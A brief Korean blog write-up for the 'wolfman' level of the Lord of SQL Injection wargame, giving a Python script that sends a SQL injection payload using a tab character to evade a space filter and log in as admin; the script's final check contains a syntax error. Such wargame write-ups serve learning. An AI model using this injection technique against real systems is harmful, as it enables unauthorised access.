WarGame/LOS

5. LOS - wolfman

m0nd2y 2018. 8. 5. 02:46

이번은 LOS 5번 wolfman입니다.


소스코드를 확인하면


id를 admin으로 만들어주면 풀 수 있게 됩니다.


페이로드는 다음과 같습니다.


1
2
3
4
5
6
7
8
9
10
11
12
13
import requests
import string
 
URL = "http://los.eagle-jump.org/wolfman_f14e72f8d97e3cb7b8fe02bef1590757.php"
payload = "?pw=1'or%09id='admin'%23" # "?pw=1'||id='admin'%23" <---도 가능합니다 :)
URL+=payload
 
cookies = dict(PHPSESSID = "dvs710ccqajrn9434hc3a00r11")
response = requests.get(URL, cookies = cookies)
print (response.text)
if response.text.find("Clear!"> 0:
    for i in range(110) :
        print("WOOOOOOOOOOOOOOOOOOOOOOWsolveIT!!")
cs


저작자표시 비영리 동일조건